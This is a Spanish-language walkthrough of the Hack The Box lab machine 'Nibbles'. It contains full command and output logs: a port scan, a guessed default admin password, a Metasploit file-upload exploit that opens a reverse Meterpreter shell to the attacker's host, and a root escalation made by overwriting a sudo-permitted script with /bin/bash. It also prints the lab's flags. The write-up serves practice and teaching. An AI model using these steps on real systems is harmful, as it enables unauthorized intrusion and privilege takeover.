__ _____ _____ _____ _ _____ | | | _ | ___| _ |___| | |_|_ _|___ | |__| | | _| |_ -| | | | | | .'| |_____|__|__| |___|__|__|___|__|__|_| |_| |__,| hola@lacashita.com

[HTB] Nibbles

Hoy vamos a hackear la maquina de HTB llamada Nibbles. Esta catalogada como facil.

Enumeration

Para empezar hacemos un nmap para ver que puertos tiene abiertos.

sml@m0nikE:~$ nmap -A -p- 10.10.10.75 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-02 15:19 CET Nmap scan report for 10.10.10.75 Host is up (0.039s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 32.09 seconds

Vemos en el codigo fuente de la pagina web que aparece el siguiente comentario:

/nibbleblog/ directory. Nothing interesting here!

Sabiendo que se tratra del CMS nibbleblog, buscamos algun exploit que pueda servirnos.

Exploitation

Encontramos un exploit que puede servirnos pero que requiere user/password. Si buscamos informacion, veremos que el usuario por defecto es admin, el cual es el que vamos a utilizar, sin embargo la password hemos tenido que "adivinarla", resultando ser nibbles. Sabiendo los credenciales, ya podemos utilizar el exploit.

msf5 > search nibble Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/http/nibbleblog_file_upload 2015-09-01 excellent Yes Nibbleblog File Upload Vulnerability msf5 > use exploit/multi/http/nibbleblog_file_upload msf5 exploit(multi/http/nibbleblog_file_upload) > show options Module options (exploit/multi/http/nibbleblog_file_upload): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD yes The password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to the web application USERNAME yes The username to authenticate with VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Nibbleblog 4.0.3 msf5 exploit(multi/http/nibbleblog_file_upload) > set targeturi /nibbleblog targeturi => /nibbleblog msf5 exploit(multi/http/nibbleblog_file_upload) > set rhosts 10.10.10.75 rhosts => 10.10.10.75 msf5 exploit(multi/http/nibbleblog_file_upload) > exploit [-] Exploit failed: The following options failed to validate: USERNAME, PASSWORD. [*] Exploit completed, but no session was created. msf5 exploit(multi/http/nibbleblog_file_upload) > set username admin username => admin msf5 exploit(multi/http/nibbleblog_file_upload) > set password nibbles password => nibbles msf5 exploit(multi/http/nibbleblog_file_upload) > exploit [*] Started reverse TCP handler on 10.10.14.6:4444 [*] Sending stage (38288 bytes) to 10.10.10.75 [*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.75:47108) at 2019-11-02 15:30:42 +0100 [+] Deleted image.php meterpreter > shell Process 1446 created. Channel 1 created. id uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)

user.txt

cd /home ls nibbler cd nibbler ls -la total 20 drwxr-xr-x 3 nibbler nibbler 4096 Dec 29 2017 . drwxr-xr-x 3 root root 4096 Dec 10 2017 .. -rw------- 1 nibbler nibbler 0 Dec 29 2017 .bash_history drwxrwxr-x 2 nibbler nibbler 4096 Dec 10 2017 .nano -r-------- 1 nibbler nibbler 1855 Dec 10 2017 personal.zip -r-------- 1 nibbler nibbler 33 Dec 10 2017 user.txt cat user.txt b02ff32bb332deba49eeaed21152c8d8

Privilege Escalation

En la carpeta de nibbler vemos que hay un fichero .zip llamado personal. Lo descomprimimos.

$ unzip personal.zip Archive: personal.zip creating: personal/ creating: personal/stuff/ inflating: personal/stuff/monitor.sh

Si miramos el codigo vemos que monitor.sh no puede ayudarnos a elevar los privilegios asi que seguimos buscando alguna pista. Usamos el comando sudo -l para ver si con nuestro usuario podemos ejecutar algun comando usando sudo...

$ sudo -l sudo: unable to resolve host Nibbles: Connection timed out Matching Defaults entries for nibbler on Nibbles: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/ snap/bin User nibbler may run the following commands on Nibbles: (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

Vemos que nuestro usuario puede ejecutar como sudo el script monitor.sh que acabamos de descomprimir. Asi que este caso es tan facil como agregar al script una linea para que ejecute bash y con ello deberia bastar para conseguir una shell con privilegios.

$ ls -l total 4 -rwxrwxrwx 1 nibbler nibbler 10 Nov 2 10:57 monitor.sh $ echo "/bin/bash" > monitor.sh $ sudo /home/nibbler/personal/stuff/monitor.sh root@Nibbles:~/personal/stuff# id uid=0(root) gid=0(root) groups=0(root) root@Nibbles:~/personal/stuff#

root.txt

root@Nibbles:~/personal/stuff# cd /root root@Nibbles:/root# cat root.txt b6d745c0dfb6457c55591efc898ef88c

End

Y con esto ya tendriamos el flag del "user" y el flag de "root".